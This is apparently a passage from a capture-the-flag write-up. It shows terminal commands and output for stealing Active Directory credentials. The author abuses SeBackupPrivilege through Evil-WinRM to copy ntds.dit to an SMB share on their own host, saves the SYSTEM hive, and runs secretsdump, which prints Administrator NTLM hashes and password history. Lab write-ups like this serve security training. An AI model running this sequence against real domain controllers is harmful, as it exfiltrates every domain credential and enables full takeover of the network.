➜ www impacket-smbserver s . -smb2support -username ctf -password lover
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
windows->
*Evil-WinRM* PS C:\programdata\temp> net use S: \\10.10.14.11\s /user:ctf lover
The command completed successfully.
Copied the ntds.dit file to my machine.
*Evil-WinRM* PS C:\programdata\temp> Copy-FileSeBackupPrivilege z:\Windows\ntds\ntds.dit \\10.10.14.11\s\ntds.ditt
I ll also need the SYSTEM registry file
reg save hklm\system system.hive
download the system.hive to kali.
➜ www impacket-secretsdump -ntds ntds.dit -system system.hive -history LOCAL [1665/1875]
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:7f1e4ff8c6a8e6b6fcae2d9c0572cd62:::
Administrator_history1:500:aad3b435b51404eeaad3b435b51404ee:ac2983b6afa7bdea9360fa7a95e31855:::
Administrator_history2:500:aad3b435b51404eeaad3b435b51404ee:a47feb765cf90d3216423e9cfedea565:::
Administrator_history3:500:aad3b435b51404eeaad3b435b51404ee:24958cffdd2aa3125c63c3fd374db44b:::